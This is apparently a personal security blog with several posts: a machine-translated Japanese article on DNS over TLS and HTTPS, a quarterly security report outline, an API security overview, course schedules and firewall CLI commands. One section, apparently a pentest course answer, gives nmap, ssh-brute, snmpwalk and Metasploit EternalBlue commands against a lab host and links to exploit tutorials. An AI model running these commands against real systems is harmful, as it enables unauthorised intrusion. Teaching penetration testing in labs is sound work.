-->

whaust

2020年3月16日 星期一

「DNS」情報セキュリティ保護の最後のマイル

従来、DNSは「ラストマイル」セキュリティ問題に悩まされてきました; DNSクライアントとローカルDNSサーバー間の通信は、ほとんど常に「クリア」な(暗号化されていない)送信です。このため、DNSはスプーフィング、ブロッキング、またはその他の干渉に対して脆弱です。これに対応して、IETFはこの問題を解決する2つのメカニズムを提案しました。1つ目は、TLS over DNS(DoT)とDNS over HTTPS(DoH)です。ただし、これらのメカニズムは両方とも、組織内の現在のセキュリティ保護アーキテクチャを回避できます。



この点で、このようなメカニズムは企業組織の安全とセキュリティに害を及ぼさないと考えています。次に、DoTとDoHを詳細に説明し、DNSクライアントのセキュリティを解決するために提案する方法を説明します。

DNS over TLS(DoT)およびDNS over HTTPS(DoH)の操作について説明します。

DNSセキュリティ拡張機能(DNSSEC)が認証およびデータ整合性チェックメカニズムにDNSを追加すると、DNSクライアントのセキュリティは通常無視されます。この時点で、ローカルDNSサーバーはDNSSEC検証を実行し、そのデータの信頼性と整合性を確立し、結果をDNSクライアントに送信しますが、この最終プロセスは「なりすまし」攻撃を受ける可能性があります。

IETFの「DPRIVE」(DNS PRIVate Exchange)ワーキンググループは、DNSの「ラストマイル」に対処する2つの新しいメカニズムを開発しました。TLSover DNS(DoTと呼ばれ、RFC7858に記録)とDNS over HTTP(DoH) RFC8484に文書化されています。

DoTとDoHは両方とも重要な機能を提供します.DoTまたはDoHを使用してDNSクライアントとDNSサーバー間の通信を暗号化してデータの機密性と整合性を提供し、DNSクライアントは任意のプロトコルを使用してDNSサーバーを実行することを選択できます本人確認。

DoTはTCPポート853のみを使用しますが、DoHはHTTPSトラフィックを使用します。これは443が使用するポートと同じです。したがって、DoHと他のHTTPSトラフィックを区別することは困難です。

長い間、お客様は内部IPとインターネット間の直接通信をブロックすることを推奨してきました。この手順により、DNSChangerなどの一部の種類のマルウェアを防ぎ、内部ホストがITによって管理されるDNSデバイス(内部DNSデバイス)を使用するように強制できます。 「応答ポリシーゾーン(RPZ)」などの名前解決ポリシーを使用できます。ただし、DoHを使用して、内部ホストがインターネット上のDNSサーバーを照会するのを防ぐことは困難です。 (DoTは853ポートのみを使用するため、簡単にブロックできます。)



DoHをサポートする一部のアプリケーションは、MozillaのFirefoxなど、クライアント側で設定されたローカルDNSを意図的にバイパスする場合がありますこのバージョンでは、DoHリスクをサポートします。サーバー側のDNS設定は、DNSクエリをHTTPS経由でCloudflareに直接送信します。これにより、ローカルセキュリティメカニズムがバイパスされ、組織がDNS解決に対して不透明になります。 Firefoxなどのアプリケーションは、DNS名前解決において他のアプリケーションとは異なり、DNSの問題の複雑さも増します。

DoH開発者の動機に疑問はありません。彼らの目標は、DNSトラフィックのスヌーピングやDNSメカニズムの使用からインターネットを保護することでもありますが、企業ネットワークでの使用に適しているかどうかは疑問です。

DoTおよびDoHの使用に関するInfobloxの推奨事項:

インターネット上の社内IPサーバーとDNSサーバー(Cloudflareを含む)間の直接DNS送信(DoTおよびDoHを含む)をブロックすることをお勧めします。この方法により、ユーザーは社内DNSを使用し、ITをITにすることができます。組織はDNS解決ポリシーを適用して、問題をトラブルシューティングできます。

内部Iおよび外部の標準DNSおよびDoT送信をブロックするのは非常に簡単です。たとえば、内部DNSホストのみが53ポートへのアクセスを許可され、DNSホストを除く内部IPは内部および外部の53および853ポートトラフィックをブロックします。

DoHのブロックはより困難で、ファイアウォールの場合、DoHとHTTPSの両方を使用することは困難であり、DNS 443と、CloudflareやGoogleなどのDNSサービスを提供する他のIPをブロックできます。

内部DNSセキュリティメカニズムを回避することは悪い考えであると考えていますが、InfobloxはDNSの「ラストマイル」問題を解決することは非常に重要で価値があると考えています。 DoTはNIOSでサポートされています。

ソース:https://blogs.info blox.com/company/dot-doh-and-the-dns-last-mile-security-problem/

2020年3月14日 星期六

季健检报告内容说明

项目
内容说明
产出文件
执行摘要
l  统整季度整体资安样貌,并提出洞察看法。
l  追踪资安需求达成状况,陈述未来一季预期的成果。
l  解释如何克服风险,并向机关提出建议。
执行摘要
资安事件监看
l  统计季度监看纪录报告,并将事件依等级分类统计。
l  追踪告警是否正确传达特定相关人员。
l  季报告中追踪执行状况。
资安监看纪录报告
资安防御措施
l  针对防御措施 (防病毒软件、网络防火墙、入侵检测及防御机制、应用程序防火墙、进阶持续性威胁攻击等)运行纪录进行检查。
l  举凡对订阅服务之期限与设定之正确性、防御原则触发纪录统计、特权账号是否设置等应注意事项进行纪录与查核。
l  季报告中追踪执行状况。
资安防御措施查核报告
资安事件
l  遇资安事件发生,资安应变小组将依照标准作业程序为资安事件纪录与通报。
l  一个月内送交调查、处理及改善报告,并于季报告中追踪处理状况。
1. 资安事件说明
2. 资安事件通报纪录
3. 资安事件应变纪录
资安检测
l  网站安全弱点检测:全部核心资通系统每年办理2
l  系统渗透测试:全部核心资通系统每年办理1次。
l  季报告中追踪执行状况。
1. 网站安全弱点检测报告
2. 系统渗透测试报告
防御调整
l  配合机关客户的需要,针对开发与测试环境的 1) 网络架构检视2) 网络恶意活动检视3)用户端计算机恶意活动检视4) 服务器主机恶意活动检视5) 目录服务器设定及防火墙联机设定检视,适时进行资安检测并实时修正。
l  调整工作纪录列入季报告当中追踪。
防御调整工作纪录
资安法遵
针对个人资料保护相关法规之政策倡导、教育训练,进行纪录,并列入季报告当中追踪。
资安法遵实施纪录

MS17-010 解答



nmap --script smb-enum-shares.nse -p 445 172.20.20.11
Exploiting ssh using metasploit
https://www.youtube.com/watch?v=uRvfx7PVcwU

https://resources.infosecinstitute.com/snmp-pentesting/#gref
nmap -p 22 --script ssh-brute --script-args userdb=users.lst,passdb=pass.lst \
  --script-args ssh-brute.timeout=4s -d
snmpwalk -c public 172.20.20.11 -v1

https://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows/
 
use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set rhosts 172.20.20.11
msf auxiliary(smb_ms17_010) > set port 445
msf auxiliary(smb_ms17_010) > exploit

use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) >set rhost 172.20.20.11
msf exploit(ms17_010_eternalblue) >set rport 445
msf exploit(ms17_010_eternalblue) >set lhost 192.168.168.7
msf exploit(ms17_010_eternalblue) > exploit


https://laucyun.com/a6cb3c752b0fc10f0a9eeef01f7a5f76.html
把eternalblue_doublepulsar.rb复制到/usr/share/metasploit-framework/modules/exploits/windows/smb


windows 7 | How to use EternalBlue & DoublePulsar Metasploit in Kali Linux 2017
https://www.youtube.com/watch?v=ptfcx8J3eyk

Troubleshooting
https://blog.csdn.net/userpass_word/article/details/85124266


NSA Hacking Tool EternalBlue – DoublePulsar | Hack Windows without any backdoor | Freaking Awesome Hacking Tool | Extreme Hack
https://blackhatinside.wordpress.com/2017/07/28/nsa-hacking-tool-eternalblue-doublepulsar-hack-windows-without-any-backdoor-freaking-awesome-hacking-tool-extreme-hack/

本月題目 2020/Mar


1.請尋找並示範一個以上密碼破解軟體(如John the Ripper)的功能並示範不同的密碼設定或密碼政策(如密碼長度)對破解時間的影響

2. PGP (Pretty Good Privacy, http:/  /www.pgpi.org) t GPG(GNU Privacy Guard, PGP ASERE RE, http://www.gnupg.org/)之使用示範(含e-mail加解密,簽章及檔案加密)

3.微軟CA 的安裝與使用示範

4.請自行架設實驗環境或使用國網中心CDX平台示範一個因為軟體漏洞而造成的資訊安全危害案例(例如SQL Injection,XSS attack,etc.)

5.請示範網路弱點掃描 軟體nessus(或類似軟體)的功能

6.請示範網路入侵偵測軟體Snort(或類似軟體)的功能。


2020年3月12日 星期四

API 安全考量 ( API Security)

近年來API平台不可避免的吸引更多的攻擊者。只要API平台使用資訊技術,就會有惡意攻擊者試圖找到這些漏洞進行攻擊。API安全大致可以分成兩類,第一類是API濫用,第二類是API攻擊。所謂的API濫用指的就是,使用者(或App)可以去呼叫API大量取得資料。而API攻擊就是注入像是SQL Injection的攻擊語法去攻擊API伺服器,藉此取得相關的主機權限。

以 OWASP API Security Top 10 2019 (註一) 的分類來說,常見的 API 風險有三大項,按照發生頻率來排序,依序是「A2:無效認證與授權」(Broken Authentication)、「A1:無效的對象層級授權」(Broken Object Level Authorization)、「A4:缺乏與存取速率的不足」(Lack of Resource and Rate Limiting),及「A10:記錄和監控機制不足」(Insufficient Logging & Monitoring)
* 註一 : https://owasp.org/www-project-api-security/



以下針對這四類弱點進行介紹:

1. 「A2:無效認證與授權」(Broken Authentication): 意指API平台未做好身份認證管理,導致攻擊者可以輕易登入系統,有機會暫時或永久取得使用者 ID,類似預設密碼、弱密碼概念,在未經授權下進入後台服務,擅自修改平台參數、進行不當操作、建立 Botnet 中繼站等。

2. 「A1:無效的對象層級授權」(Broken Object Level Authorization):意指攻擊者利用後臺權限控管的漏洞能輕易轉換權限,初次通過身份驗證後,不需經過再次驗證即可調用其他使用者的資料。擅自修改為 001、002、003…等等用戶編號,佯裝為不同身份,恣意存取各個使用者的機敏資料。有些案例甚至可以做到「垂直提權」取得管理者身分,造成重大危害。

3. 「A4:缺乏與存取速率的不足」(Lack of Resource and Rate Limiting): 意指 API平台對使用者請求的資源數量、請求次數多寡未施加任何限制,可能導致 API 發佈過多封包、變相釀成 DDoS 攻擊,造成服務停擺。

4. 「A10:記錄和監控機制不足」(Insufficient Logging & Monitoring):當API平台遇到攻擊行為的時候,能否偵測並且有效應對,例如,當發現外部有人正在掃描攻擊時,使用者是否可以針對這些攻擊「感知」並且做到「阻擋」。此外使用記錄可以作為行為模式分析之用,以作為持續精進防護原則依據。

## API防禦措施:

1. 以 TLS (Transport Layer Security) 為基礎
* 傳輸層安全性協定 (TLS) 會將流量加密,以確保用戶與正確的伺服器通訊,是 API 的安全性基礎。所有 API 都應該以 TLS 為基礎。
* 隨時更新 TLS:利用像是 Qualisys SSL Labs 的 SSL Server Test 服務測試 TLS 的配置。(註二:https://www.ssllabs.com/ssltest/)
* 利用追蹤工具、資料遮罩和標記化 (tokenization) 等技術。

2. 加強身份驗證機制
* 使用者與應用程式都需要被驗證身份。
* 控制 API 存取權限是有效確保 API 安全的基礎,API平台應該使用 OAuth 對使用者進行身份驗證。

3. API服務上使用速率限制來防止暴力攻擊,並且管理流量
* 使用速率限制防止暴力攻擊,舉例來說:一個攻擊者可能會利用自動化軟體猜測密碼,造成大量連續登入嘗試。API查詢若不受速率限制,則會無限制地允許此攻擊,直到攻擊成功為止。

4. 使用行為模式 (Behavioral Patterns) 和機器學習阻檔意圖不良的機器人程式
* 監控 API 的存取模式與流量的狀況,才能發現可疑的行為。
* 利用使用記錄進行演算法和機器學習以發現意圖不良的機器人程式。
* 留意有些適用於阻止網路或 Web 攻擊的方法可能不適用於 API。

5. 透過弱點掃瞄、滲透測試、原碼檢測,甚至資安流程監控等服務。



## 運用機器學習分析API使用異常:

在營運API平台時,當有使用異常時,要能即時通知管理者,一般需要建立API即時異常檢測系統。該系統將歷史資料進行分析,分析方法運用機器學習(Machine Learning)演算法,進行資料探勘(Data Mining),對歷史資料進行行為塑模」(Behavior Modeling)


在完成行為塑模」後,可以對即時資料進行檢測(Detect Anomalies),針對異常行為發生時,能及時發出告警或是在應用程式中顯示出來。




















駭客專家以駭客的角度,協助分析 使用異常情境,並在塑模階段與檢測特徵中提出建議。



## 營運介面參考




2020年3月10日 星期二

2020/03 期交所遠端課程

課程主题日期會議ID可登入時間
選擇權入門(上)3/117496483273/11 18:30
加入會議室連結
選擇權入門(下)3/124262140533/12 18:30
加入會議室連結
期貨與選擇權進階(上)3/184825801163/18 18:30
加入會議室連結
期貨與選擇權進階(下)3/199304983623/19 18:30
加入會議室連結

CLI COMMANDS TO EXPORT/IMPORT CONFIGURATION AND LOG FILES


Resolution

Details

The following four commands can be used to export and import various log and configuration files, and does not require special permissions, other than being an administrator. Note that the SCP option works only for Linux/Unix servers.
Note:  For PAN-OS 7.0, refer to the PAN-OS CLI Quick Start for the procedure to Use Secure Copy to Import and Export Files.
> scp export log
  • data      data
  • threat    threat
  • traffic   traffic
  • url       url
> scp export log-file
  • control-plane      Use scp to export control-plane log-file
  • data-plane0        Use scp to export data-plane0 log-file
  • data-plane1        Use scp to export data-plane1 log-file
  • data-plane2        Use scp to export data-plane2 log-file
  • management-plane   Use scp to export management-plane log-file
> tftp export log-file
  • control-plane      Use scp to export control-plane log-file
  • data-plane0        Use scp to export data-plane0 log-file
  • data-plane1        Use scp to export data-plane1 log-file
  • data-plane2        Use scp to export data-plane2 log-file
  • management-plane   Use scp to export management-plane log-file
The following four commands requires a Dynamic Role of Superuser or Superuser (read-only), or a Role Based Role with CLI elevation of superuser or super reader:
> scp export configuration
  • remote-port   SSH port number on remote host
  • source-ip     Set source address to specified interface address
  • from          from
  • to            Destination (username@host:path)
>  tftp export configuration
  • remote-port   SSH port number on remote host
  • source-ip     Set source address to specified interface address
  • from          from
  • to            Destination (username@host:path)
> scp import configuration
  • remote-port   SSH port number on remote host
  • source-ip     Set source address to specified interface address
  • from          Source (username@host:path)
> tftp import configuration
  • remote-port   SSH port number on remote host
  • source-ip     Set source address to specified interface address
  • from          Source (username@host:path)
The following scp import logdb and scp export logdb commands are applicable only for Palo Alto Networks firewalls (except the PA-7000 Series) and Panorama VM with versions up to 5.1.
> scp import logdb
  • remote-port   SSH port number on remote host
  • source-ip     Set source address to specified interface address
  • from          Source (username@host:path)
> scp export logdb

  • remote-port   SSH port number on remote host
  • source-ip     Set source address to specified interface address
  • to            Destination (username@host:path_to_destination_filename)

Popular